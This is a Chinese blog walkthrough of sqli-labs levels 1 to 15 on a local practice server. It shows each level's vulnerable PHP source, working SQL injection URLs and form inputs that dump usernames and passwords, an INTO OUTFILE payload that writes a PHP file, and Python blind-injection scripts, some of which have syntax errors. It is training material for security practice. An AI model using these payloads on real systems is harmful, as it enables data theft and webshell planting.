devbox
运维做开发
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

sqllab靶场练习第1~15关

作者:运维做开发 | 2024-08-07 12:08:10

sqllab靶场练习第1~15关

1、第一关

代码解析

  1. if(isset($_GET['id']))//判断获取的id字段是否为空
  2. {
  3. $id=$_GET['id'];
  4. //logging the connection parameters to a file for analysis.
  5. $fp=fopen('result.txt','a');//打开这个文件,记录操作的日志
  6. fwrite($fp,'ID:'.$id."\n");
  7. fclose($fp);
  9. // connectivity 
  12. $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

查看第一关源码后,发现对用户的输入没有做任何的过滤。

sql注入代码:

http://192.168.208.143/sqllab/Less-1/?id=1

闭合单引号,再使用--+注释后面的单引号(关于--+的解释w3c官方标准:https://www.w3.org/TR/html4/interact/forms.html#h-17.13.4.1),使用order by函数求列数,用1代表第一列来排序,将数字从1到4,发现没有第4列

注:关于+代表空格解释,如若不明白可参考这篇文章https://www.cnblogs.com/xiaxveliang/p/14438336.html

http://192.168.208.143/sqllab/Less-1/?id=1%27order%20by%201;--+

http://192.168.208.143/sqllab/Less-1/?id=1%27order%20by%204;--+

union联合查询

http://192.168.208.143/sqllab/Less-1/?id=1%27union%20select%201,2,3;--+

让第一个表为空(让它查不到数据),显示联合查询的第二个表的数据。

http://192.168.208.143/sqllab/Less-1/?id=-1%27union%20select%201,2,3;--+

http://192.168.208.143/sqllab/Less-1/?id=-1%27union%20select%201,user(),database();--+

查看数据库拥有的表

MYsql数据库自带四个数据库:informatio_schema、mysql、performance_schema、sys

在information_schema数据库中拥有所有数据库的信息,查看security的表名

select table_name from tables where table_schema='security';


http://192.168.208.143/sqllab/Less-1/?id=-1%27union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27;--+

查看users拥有的列名

select column_name from columns where table_schema='security' and table_name='users';


http://192.168.208.143/sqllab/Less-1/?id=-1%27union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27;--+

查看用户名和密码

http://192.168.208.143/sqllab/Less-1/?id=-1%27union%20select%201,group_concat(username),group_concat(password)%20from%20security.users;--+

第2关

将第1关的单引号闭合删掉,就是第2关

源码:

  1. if(isset($_GET['id']))
  2. {
  3. $id=$_GET['id'];
  4. //logging the connection parameters to a file for analysis.
  5. $fp=fopen('result.txt','a');
  6. fwrite($fp,'ID:'.$id."\n");
  7. fclose($fp);
  8.  
  9.  
  10. // connectivity 
  11. $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

sql注入:

http://192.168.208.143/sqllab/Less-2/?id=-1%20union%20select%201,group_concat(username),group_concat(password)%20from%20security.users;--+

第3关

改变一下闭合方式

源码:

  1. if(isset($_GET['id']))
  2. {
  3. $id=$_GET['id'];
  4. //logging the connection parameters to a file for analysis.
  5. $fp=fopen('result.txt','a');
  6. fwrite($fp,'ID:'.$id."\n");
  7. fclose($fp);
  8.  
  9. // connectivity 
  10.  
  11.  
  12. $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

sql注入:

http://192.168.208.143/sqllab/Less-3/?id=-1%27)%20union%20select%201,group_concat(username),group_concat(password)%20from%20security.users;--+

第4关

改变一下闭合方式

源码:

  1. if(isset($_GET['id']))
  2. {
  3. $id=$_GET['id'];
  4. //logging the connection parameters to a file for analysis.
  5. $fp=fopen('result.txt','a');
  6. fwrite($fp,'ID:'.$id."\n");
  7. fclose($fp);
  8.  
  9. // connectivity 
  10.  
  11. $id = '"' . $id . '"';
  12. $sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";

SQL注入:

http://192.168.208.143/sqllab/Less-4/?id=-1%22)%20union%20select%201,group_concat(username),group_concat(password)%20from%20security.users;--+

第5关

通过改变一下闭合方式,发现注入不成功

http://192.168.208.143/sqllab/Less-5/?id=-1%27%20union%20select%201,group_concat(username),group_concat(password)%20from%20security.users;--+

源码:

  1. if(isset($_GET['id']))
  2. {
  3. $id=$_GET['id'];
  4. //logging the connection parameters to a file for analysis.
  5. $fp=fopen('result.txt','a');
  6. fwrite($fp,'ID:'.$id."\n");
  7. fclose($fp);
  8.  
  9. // connectivity 
  10.  
  11.  
  12. $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
  13. $result=mysql_query($sql);
  14. $row = mysql_fetch_array($result);
  15.  
  16. 	if($row)
  17. 	{
  18.   	echo '<font size="5" color="#FFFF00">';	
  19.   	echo 'You are in...........';
  20.   	echo "<br>";
  21.     	echo "</font>";
  22.   	}
  23. 	else 
  24. 	{
  25. 	
  26. 	echo '<font size="3" color="#FFFF00">';
  27. 	print_r(mysql_error());
  28. 	echo "</br></font>";	
  29. 	echo '<font color= "#0000ff" font size= 3>';	
  30. 	
  31. 	}
  32. }
  33. 	else { echo "Please input the ID as parameter with numeric value";}

查看源码后,发现,可以通过报错,注入

SQL注入:

http://192.168.208.143/sqllab/Less-5/?id=-1%27%20and%20updatexml(1,concat(0x7e,(select%20substr(group_concat(username,0x3a,password),1,32)from%20users),0x7e),1);--+

updatexml函数一次只能显示32位,可以利用substr函数,以32位单位来截取

第6关

将第5关的单引号闭合方式,更改为双引号闭合

源码:

  1. if(isset($_GET['id']))
  2. {
  3. $id=$_GET['id'];
  4. //logging the connection parameters to a file for analysis.
  5. $fp=fopen('result.txt','a');
  6. fwrite($fp,'ID:'.$id."\n");
  7. fclose($fp);
  8.  
  9. // connectivity 
  10.  
  11. $id = '"'.$id.'"';
  12. $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

SQL注入:

http://192.168.208.143/sqllab/Less-6/?id=-1%22%20and%20updatexml(1,concat(0x7e,(select%20substr(group_concat(username,0x3a,password),1,32)from%20users),0x7e),1);--+

剩下的与第5关一样

第7关

将闭合方式改为'))

源码:

  1. if(isset($_GET['id']))
  2. {
  3. $id=$_GET['id'];
  4. //logging the connection parameters to a file for analysis.
  5. $fp=fopen('result.txt','a');
  6. fwrite($fp,'ID:'.$id."\n");
  7. fclose($fp);
  8.  
  9. // connectivity 
  10.  
  11.  
  12. $sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
  13. $result=mysql_query($sql);
  14. $row = mysql_fetch_array($result);
  15.  
  16. 	if($row)
  17. 	{
  18.   	echo '<font color= "#FFFF00">';	
  19.   	echo 'You are in.... Use outfile......';
  20.   	echo "<br>";
  21.   	echo "</font>";
  22.   	}
  23. 	else 
  24. 	{
  25. 	echo '<font color= "#FFFF00">';
  26. 	echo 'You have an error in your SQL syntax';
  27. 	//print_r(mysql_error());
  28. 	echo "</font>";  
  29. 	}
  30. }
  31. 	else { echo "Please input the ID as parameter with numeric value";}

SQL注入:

http://192.168.208.143/sqllab/Less-7/?id=-1%27))%20and%20updatexml(1,concat(0x7e,(select%20substr(group_concat(username,0x3a,password),1,32)from%20users),0x7e),1);--+

注:

第七关还有一个outfile漏洞可以注入webshell,但是该漏洞的利用条件十分苛刻,条件如下:

1、该用户权限必须为root权限

2、必须知道网站的物理路径,如D:\\...

3、mysql文件中的secure_file_priv文件的值,必须为空,不能是null或物理路径

查看语句

必须像这样,如若不是,该漏洞无法利用。

修改secure_file_priv的值,可参考这篇文章:Windows mysql secure_file_priv 设置_secure-file-priv=-CSDN博客

http://sqlmaps/Less-7/?id=-1%27))%20union%20select%201,2,%22%3C?php%20phpinfo();?%3E%22%20into%20outfile%20%22D:/dev_soft/phpstudy_pro/WWW/sqli-labs-master/web.php%22--+

第8关

源码:

  1. if(isset($_GET['id']))
  2. {
  3. $id=$_GET['id'];
  4. //logging the connection parameters to a file for analysis.
  5. $fp=fopen('result.txt','a');
  6. fwrite($fp,'ID:'.$id."\n");
  7. fclose($fp);
  8.  
  9. // connectivity 
  10.  
  11.  
  12. $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
  13. $result=mysql_query($sql);
  14. $row = mysql_fetch_array($result);
  15.  
  16. 	if($row)
  17. 	{
  18.   	echo '<font size="5" color="#FFFF00">';	
  19.   	echo 'You are in...........';
  20.   	echo "<br>";
  21.     	echo "</font>";
  22.   	}
  23. 	else 
  24. 	{
  25. 	
  26. 	echo '<font size="5" color="#FFFF00">';
  27. 	//echo 'You are in...........';
  28. 	//print_r(mysql_error());
  29. 	//echo "You have an error in your SQL syntax";
  30. 	echo "</br></font>";	
  31. 	echo '<font color= "#0000ff" font size= 3>';	
  32. 	
  33. 	}
  34. }
  35. 	else { echo "Please input the ID as parameter with numeric value";}

查看源码后,发现报错不打印,union也不行。利用真假来注入

SQL注入:

http://192.168.208.143/sqllab/Less-8/?id=1%27%20and%20ascii(substr(database(),1,1))%3E114--+

http://192.168.208.143/sqllab/Less-8/?id=1%27%20and%20ascii(substr(database(),1,1))%3E115--+

发现数据库的第一个字母为ascii的115,对照ASCII码表,发现是s;但是手工一个一个注入太麻烦,可以利用Python执行布尔盲注脚本

  1. url = 'http://192.168.208.143/sqllab/Less-8/'
  2.  
  3. def inject_database(url):
  4.     name = ''
  5.     for i in range(1,20):
  6.         for j in range(32,129):
  7.             payload = "1' and ascii(substr(database(), %d, 1)) = %d -- " % (i, j)
  8.              res = {"id":payload}
  9.              r = requests.get(url, params=res)
  10.              if "You are in..........." in r.text:
  11.                  name = name + chr(j)
  12.                  print(name)
  13.                  break
  14.              else:
  15.                  continue
  16. inject_database(url)

第9关

源码:

  1. if(isset($_GET['id']))
  2. {
  3. $id=$_GET['id'];
  4. //logging the connection parameters to a file for analysis.
  5. $fp=fopen('result.txt','a');
  6. fwrite($fp,'ID:'.$id."\n");
  7. fclose($fp);
  8.  
  9. // connectivity 
  10.  
  11.  
  12. $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
  13. $result=mysql_query($sql);
  14. $row = mysql_fetch_array($result);
  15.  
  16. 	if($row)
  17. 	{
  18.   	echo '<font size="5" color="#FFFF00">';	
  19.   	echo 'You are in...........';
  20.   	echo "<br>";
  21.     	echo "</font>";
  22.   	}
  23. 	else 
  24. 	{
  25. 	
  26. 	echo '<font size="5" color="#FFFF00">';
  27. 	echo 'You are in...........';
  28. 	//print_r(mysql_error());
  29. 	//echo "You have an error in your SQL syntax";
  30. 	echo "</br></font>";	
  31. 	echo '<font color= "#0000ff" font size= 3>';	
  32. 	
  33. 	}
  34. }
  35. 	else { echo "Please input the ID as parameter with numeric value";}

查看源码后,发现不管是正确或错误都是you are in;可以利用时间差来判断

SQL注入:

http://192.168.208.143/sqllab/Less-9/?id=1%27%20and%20if(ascii(substr(database(),1,1))%3E110,%20sleep(3),%200)--+

当值为真时,时间大于sleep的时间,当值为假时,时间小于sleep的时间。

时间盲注:

  1. url = 'http://192.168.208.143/sqllab/Less-9/'
  2.  
  3. def inject_database(url):
  4.     name = ''
  5.     for i in range(1, 20):
  6.         low = 32
  7.         high = 128
  8.         mid = (low + high) // 2
  9.         while low < high:
  10.             payload = "1' and if(ascii(substr(database(), %d, 1)) > %d, sleep(1), 0)-- " % (i, mid)
  11.             res = {"id": payload}
  12.             start_time = time.time()
  13.             r = requests.get(url, params=res)
  14.             end_time = time.time()
  15.             if end_time - start_time >= 1:
  16.                 low = mid + 1
  17.             else:
  18.                 high = mid
  19.             mid = (low + high) // 2
  20.  
  21.         if mid == 32:
  22.             break
  23.         name = name + chr(mid)
  24.         print(name)
  25.  
  26. inject_database(url)

第10关

将第9关的闭合方式修改一下

源码:

  1. if(isset($_GET['id']))
  2. {
  3. $id=$_GET['id'];
  4. //logging the connection parameters to a file for analysis.
  5. $fp=fopen('result.txt','a');
  6. fwrite($fp,'ID:'.$id."\n");
  7. fclose($fp);
  8.  
  9. // connectivity 
  10.  
  11. $id = '"'.$id.'"';
  12. $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

SQL注入:

  1. url = 'http://192.168.208.143/sqllab/Less-10/'
  2.  
  3. def inject_database(url):
  4.     name = ''
  5.     for i in range(1, 20):
  6.         low = 32
  7.         high = 128
  8.         mid = (low + high) // 2
  9.         while low < high:
  10.             payload = "1" and if(ascii(substr(database(), %d, 1)) > %d, sleep(1), 0)-- " % (i, mid)
  11.             res = {"id": payload}
  12.             start_time = time.time()
  13.             r = requests.get(url, params=res)
  14.             end_time = time.time()
  15.             if end_time - start_time >= 1:
  16.                 low = mid + 1
  17.             else:
  18.                 high = mid
  19.             mid = (low + high) // 2
  21.         if mid == 32:
  22.             break
  23.         name = name + chr(mid)
  24.         print(name)
  26. inject_database(url)

第11关

源码:

  1. if(isset($_POST['uname']) && isset($_POST['passwd']))
  2. {
  3. 	$uname=$_POST['uname'];
  4. 	$passwd=$_POST['passwd'];
  5.  
  6. 	//logging the connection parameters to a file for analysis.
  7. 	$fp=fopen('result.txt','a');
  8. 	fwrite($fp,'User Name:'.$uname);
  9. 	fwrite($fp,'Password:'.$passwd."\n");
  10. 	fclose($fp);
  11.  
  12.  
  13. 	// connectivity 
  14. 	@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
  15. 	$result=mysql_query($sql);
  16. 	$row = mysql_fetch_array($result);
  17.  
  18. 	if($row)
  19. 	{
  20.   		//echo '<font color= "#0000ff">';	
  21.   		
  22.   		echo "<br>";
  23. 		echo '<font color= "#FFFF00" font size = 4>';
  24. 		//echo " You Have successfully logged in\n\n " ;
  25. 		echo '<font size="3" color="#0000ff">';	
  26. 		echo "<br>";
  27. 		echo 'Your Login name:'. $row['username'];
  28. 		echo "<br>";
  29. 		echo 'Your Password:' .$row['password'];
  30. 		echo "<br>";
  31. 		echo "</font>";
  32. 		echo "<br>";
  33. 		echo "<br>";
  34. 		echo '<img src="../images/flag.jpg"  />';	
  35. 		
  36.   		echo "</font>";
  37.   	}
  38. 	else  
  39. 	{
  40. 		echo '<font color= "#0000ff" font size="3">';
  41. 		//echo "Try again looser";
  42. 		print_r(mysql_error());
  43. 		echo "</br>";
  44. 		echo "</br>";
  45. 		echo "</br>";
  46. 		echo '<img src="../images/slap.jpg" />';	
  47. 		echo "</font>";  
  48. 	}
  49. }

SQL注入:

admin' union select 1,user()#

手工注入太麻烦,我们可以使用burpsuite工具来注入

第12关

跟第11关相同,只用修改闭合方式

源码:

  1. if(isset($_POST['uname']) && isset($_POST['passwd']))
  2. {
  3. 	$uname=$_POST['uname'];
  4. 	$passwd=$_POST['passwd'];
  5.  
  6. 	//logging the connection parameters to a file for analysis.
  7. 	$fp=fopen('result.txt','a');
  8. 	fwrite($fp,'User Name:'.$uname."\n");
  9. 	fwrite($fp,'Password:'.$passwd."\n");
  10. 	fclose($fp);
  11.  
  12.  
  13. 	// connectivity
  14. 	$uname='"'.$uname.'"';
  15. 	$passwd='"'.$passwd.'"'; 
  16. 	@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
  17. 	$result=mysql_query($sql);
  18. 	$row = mysql_fetch_array($result);

第13关

源码:

  1. if(isset($_POST['uname']) && isset($_POST['passwd']))
  2. {
  3. 	$uname=$_POST['uname'];
  4. 	$passwd=$_POST['passwd'];
  5.  
  6. 	//logging the connection parameters to a file for analysis.
  7. 	$fp=fopen('result.txt','a');
  8. 	fwrite($fp,'User Name:'.$uname."\n");
  9. 	fwrite($fp,'Password:'.$passwd."\n");
  10. 	fclose($fp);
  11.  
  12.  
  13. 	// connectivity 
  14. 	@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
  15. 	$result=mysql_query($sql);
  16. 	$row = mysql_fetch_array($result);
  17.  
  18. 	if($row)
  19. 	{
  20.   		//echo '<font color= "#0000ff">';	
  21.   		
  22.   		echo "<br>";
  23. 		echo '<font color= "#FFFF00" font size = 4>';
  24. 		//echo " You Have successfully logged in " ;
  25. 		echo '<font size="3" color="#0000ff">';	
  26. 		echo "<br>";
  27. 		//echo 'Your Login name:'. $row['username'];
  28. 		//echo "<br>";
  29. 		//echo 'Your Password:' .$row['password'];
  30. 		//echo "<br>";
  31. 		echo "</font>";
  32. 		echo "<br>";
  33. 		echo "<br>";
  34. 		echo '<img src="../images/flag.jpg"   />';	
  35. 		
  36.   		echo "</font>";
  37.   	}
  38. 	else  
  39. 	{
  40. 		echo '<font color= "#0000ff" font size="3">';
  41. 		//echo "Try again looser";
  42. 		print_r(mysql_error());
  43. 		echo "</br>";
  44. 		echo "</br>";
  45. 		echo "</br>";
  46. 		echo '<img src="../images/slap.jpg"   />';	
  47. 		echo "</font>";  
  48. 	}

查看源码,发现正确不提示,报错提示,可以使用报错注入

SQL注入:

min') and updatexml(1, concat(0x7e,(select distinct concat(0x7e,(select table_name),0x7e)from information_schema.tables where table_schema='security' limit 0,1 ),0x7e),1)#

第14关

跟第13关闭合方式不一样,修改一下就OK了

源码:

  1. if(isset($_POST['uname']) && isset($_POST['passwd']))
  2. {
  3. 	$uname=$_POST['uname'];
  4. 	$passwd=$_POST['passwd'];
  5.  
  6. 	//logging the connection parameters to a file for analysis.
  7. 	$fp=fopen('result.txt','a');
  8. 	fwrite($fp,'User Name:'.$uname."\n");
  9. 	fwrite($fp,'Password:'.$passwd."\n");
  10. 	fclose($fp);
  11.  
  12.  
  13. 	// connectivity
  14. 	$uname='"'.$uname.'"';
  15. 	$passwd='"'.$passwd.'"'; 
  16. 	@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
  17. 	$result=mysql_query($sql);

第15关

源码:

  1. if(isset($_POST['uname']) && isset($_POST['passwd']))
  2. {
  3. 	$uname=$_POST['uname'];
  4. 	$passwd=$_POST['passwd'];
  5.  
  6. 	//logging the connection parameters to a file for analysis.
  7. 	$fp=fopen('result.txt','a');
  8. 	fwrite($fp,'User Name:'.$uname);
  9. 	fwrite($fp,'Password:'.$passwd."\n");
  10. 	fclose($fp);
  11.  
  12.  
  13. 	// connectivity 
  14. 	@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
  15. 	$result=mysql_query($sql);
  16. 	$row = mysql_fetch_array($result);
  17.  
  18. 	if($row)
  19. 	{
  20.   		//echo '<font color= "#0000ff">';	
  21.   		
  22.   		echo "<br>";
  23. 		echo '<font color= "#FFFF00" font size = 4>';
  24. 		//echo " You Have successfully logged in\n\n " ;
  25. 		echo '<font size="3" color="#0000ff">';	
  26. 		echo "<br>";
  27. 		//echo 'Your Login name:'. $row['username'];
  28. 		echo "<br>";
  29. 		//echo 'Your Password:' .$row['password'];
  30. 		echo "<br>";
  31. 		echo "</font>";
  32. 		echo "<br>";
  33. 		echo "<br>";
  34. 		echo '<img src="../images/flag.jpg"  />';	
  35. 		
  36.   		echo "</font>";
  37.   	}
  38. 	else  
  39. 	{
  40. 		echo '<font color= "#0000ff" font size="3">';
  41. 		//echo "Try again looser";
  42. 		//print_r(mysql_error());
  43. 		echo "</br>";
  44. 		echo "</br>";
  45. 		echo "</br>";
  46. 		echo '<img src="../images/slap.jpg"   />';	
  47. 		echo "</font>";  
  48. 	}
  49. }

查看源码后,发现只能根据图片判断是否注入成功

SQL注入:

布尔盲注:

  1. url = 'http://192.168.208.143/sqllab/Less-15/'
  2.  
  3. def inject_database(url):
  4.     name = ''
  5.     for i in range(1,20):
  6.         for j in range(32,129):
  7.             data = {"uname":"admin' and ascii(substr(database(), %d, 1)) = %d#" %(i,j),
  8.                 "passwd":"a"
  9.              r = requests.post(url, data=data)
  10.              if "flag.jpg" in r.text:
  11.                  name = name + chr(j)
  12.                  print(name)
  13.                  break
  14.              else:
  15.                  continue
  16. inject_database(url)

时间盲注:

  1. url = 'http://192.168.208.143/sqllab/Less-15/'
  2. def inject_database(url):
  3.     name = ''
  4.     for i in range(1,20):
  5.         for j in range(32,129):
  6.             database_payload = {"uname": "admin' and if(ascii(substr(database(),%d,1))=%d,sleep(2),1)#" % (i, j),
  7.                                 "passwd": "1"}
  8.             time1 = datetime.datetime.now()
  9.             res = requests.post(url, database_payload)
  10.             time2 = datetime.datetime.now()
  11.             difference = (time2 - time1).seconds
  12.             if difference > 1:
  13.                 name += chr(j)
  14.                 print("数据库名为->" + name)
  15. inject_database(url)

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/运维做开发/article/detail/942446
推荐阅读
相关标签

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。

  

闽ICP备14008679号